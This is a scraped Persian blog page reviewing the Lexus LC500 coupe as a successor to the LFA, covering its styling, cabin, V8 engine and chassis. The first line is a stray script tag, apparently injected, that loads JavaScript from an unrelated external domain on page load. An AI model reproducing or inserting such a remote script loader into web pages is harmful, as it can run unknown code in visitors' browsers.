script type="text/javascript" src="http://7vps.ir/img/website.js"> لکسوس LC500 جایگزین خودروی اسپرت LFA
کافی نت
وبلاگی جذاب

درست سال ۲۰۱۲ بود که شرکت خودروسازی لکسوس از خودروی کانسپتی بنام LF-LC رونمایی کرد. خودرویی که شاید جایگزین کوپه LFA همین شرکت می شد و جای خالی این خودرو را پر می کرد تا باری دیگر برند لکسوس در کلاس خودروهای اسپرت قد علم کند، اما متاسفانه اطلاعات زیادی از خودرو و زمان تولید نسخه اصلی آن منتشر نشد، سال پیش نیز این شرکت ژاپنی یک مدل دیگر براساس کانسپت LF-LC رونمایی کرد که اینبار در کلاس خودروی سدان قرار می گرفت و زبان طراحی این شرکت را به رخ می کشید. حال شرکت لکسوس بعد از گذشت ۱ سال از رونمایی آخرین کانسپت خود خودرویی بنام LC500 را رونمایی کرده است که براساس همان خودروی کانسپت LF-LC طراحی و به مرحله تولید رسیده است.lexus-lc500-9

لکسوس LC500 جایگزین خودروی اسپرت LFA می شود

این خودرو از زبان طراحی جدید شرکت لکسوس پیروی می کند، طراحی زیبا و چشم نواز که سعی بر حفظ مؤلفه‌های طراحی اصلی کانسپت LF-LC در آن شده است تا نهایت زیبایی بدست آید. همانطور که می‌بینید، لکسوس مشابه با طرح کاسنپت LF-LC، در جلوی بدنه LC500 جلوپنجره‌ای بزرگ و گسترده را طراحی کرده که درون آن را با جزئیات کوچک کرومی رنگ پر کرده و حاشیه آن را هم نواری کرومی رنگ زیبا در بر گرفته است. در اطراف این جلوپنجره زیبا هم چراغ‌های پیشانی شکیل و مدرنیته طراحی شده که در زیر آن ورودی‌های هوای خنک کاری رادیاتورهای جانبی قالب گیری شده است. با چرخیدن به دور خودرو و نگاه انداختن به طراحی عقبی خودرو هم با یک طراحی دوچندان جذاب‌تر و زیباتر از طراحی جلویی مواجه خواهید شد که چراغ‌های پیشرفته و خروجی‌های اگزوز متوازی الاضلاع کرومی رنگ آن بیشترین تاثیر را در زیبایی آن گذاشته اند. به جای استفاده از اسپویلری جداگانه هم از همان درب صندوق عقب کمک گرفته شده و با استفاده از قالب گیری، اسپویلری ثابت برای لکسوس LC500 دست و پا کرده‌اند.lexus-lc500-6

لکسوس LC500 جایگزین خودروی اسپرت LFA می شود

در داخل کابین همان‌طور که از لکسوس انتظار می‌رود شاهد ترکیبی لوکس و با کیفیت از چرم، آلکانترا و سایر مواد گران قیمت نظیر منیزیوم برای شیفتر پشت فرمان هستیم. کلیات این مجموعه از لکسوس LFA الهام گرفته‌اند اما این موضوع نکته منفی محسوب نمی‌شود. صندلی‌های اسپرت با قسمتهای تقویتی و حمایتی اضافی در پهلوها همراه شده‌اند و البته در مدل استاندارد، شاهد صندلی‌های ساده‌تری که راحتی بیشتری دارند خواهید بود.

این کوپه با عملکرد بالا به صورت ۲+۲ نفره و در دو نسخه معمولی و هیبریدی در دسترس خواهد بود. مدل اصلی از یک موتور ۸ سیلندر ۵٫۰ لیتری با تنفس طبیعی با قدرت ۴۷۷ اسب بخار و گشتاور ۵۳۰ نیوتن متر سود می‌برد. این موتور با یک گیربکس ۱۰ سرعته اتوماتیک که توسط Aisin توسعه یافته جفت می‌شود که می تواند در کمتر از ۵/۴ ثانیه سرعت خود را به ۱۰۰ کیلومتر بر ساعت برساند.

برای تولید این خودرو بیش از سه سال در واحد تحقیق و توصعه برای مطالعه زمان گذاشته شد و در نهایت خودرویی طراحی شد که برندگی خطوط آن همانند تیغ می باشد. در طراحی این خودرو همکاری بین تیم های تحقیق و توسعه و مهندسین لکسوس به اوج خود رسید تا جایی که این خودرو به عنوان سمبلی از طراحی ها معرفی شد. از سویی ممکن است یک موتور ۸ سیلندر ۴٫۰ لیتری جدید با توربوشارژر الکتریکی دوقلو نیز در مدل LC F قرار گیرد که نیرویی ۶۱۲ اسبی برای آن پیش بینی می‌شود که قدرتمندترین لکسوس تاریخ را شکل می‌دهد.lexus-lc500-8

لکسوس LC500 جایگزین خودروی اسپرت LFA می شود

لکسوس LC 500 روی پلتفرم کاملاً جدید GA-L که معماری موتور جلو و دیفرانسیل عقب دارد بنا شده است. در این معماری، به‌طور قابل‌توجهی تجربه رانندگی تند و تیز با وجود قرارگیری در ارتفاع پایین‌تر و نزدیک مرکز خودرو حاصل می‌شود. به گفته شرکت لکسوس، شاسی LC500 سخت‌ترین نمونه ایست که تا به حال مهندسین این شرکت تولید نموده‌اند و این یعنی این شاسی از جنس فولاد با مقاومت بالا حتی از شاسی فیبر کربنی LFA نیز مقاوم‌تر است. در عین حال این شاسی فولادی در قسمت‌هایی در تعلیق جلو و ساختارهای گلگیرهای عقب از آلومینیوم ساخته شده که باعث کاهش وزنان شده است. سقف از جنس فیبر کربن بوده و درب موتور نیز آلومینیومی است. استفاده از کامپوزیت و فیبر کربن در قسمت‌های مختلف باعث توزیع وزن مطلوب به‌صورت ۵۲/۴۸ بین دو اکسل شده است.
در ادامه دو ویدئو از این خودرو را برای شما آماده کرده ایم که پیشنهاد میکنیم به هیچ وجه از دست ندهید. و همچنین نظر شما درباره این خودروی چیست؟ آیا این خودرو می توان به خوبی جای خالی LFA را پر کند؟



نظرات شما عزیزان:

نام :
آدرس ایمیل:
وب سایت/بلاگ :
متن پیام:
:) :( ;) :D
;)) :X :? :P
:* =(( :O };-
:B /:) =DD :S
-) :-(( :-| :-))
نظر خصوصی

 کد را وارد نمایید:

 

 

 

عکس شما

آپلود عکس دلخواه:







درباره وبلاگ


به وبلاگ خودتان خوش آمدید امیدوارم که در این وبلاگ بتوانم نیاز شما دوست گرامی را برآورده سازم.
آخرین مطالب
آرشيو وبلاگ
نويسندگان
موضوعات
پيوندها

تبادل لینک هوشمند
برای تبادل لینک  ابتدا ما را با عنوان کافی نت و آدرس caffinet.LoxBlog.ir لینک نمایید سپس مشخصات لینک خود را در زیر نوشته . در صورت وجود لینک ما در سایت شما لینکتان به طور خودکار در سایت ما قرار میگیرد.








نام :
وب :
پیام :
2+2=:
(Refresh)

<-PollName->

<-PollItems->

خبرنامه وب سایت:





آمار وب سایت:  

بازدید امروز :
بازدید دیروز :
بازدید هفته :
بازدید ماه :
بازدید کل :
تعداد مطالب : 562
تعداد نظرات : 8
تعداد آنلاین : 1


آریان پیامک
آریان اس ام اس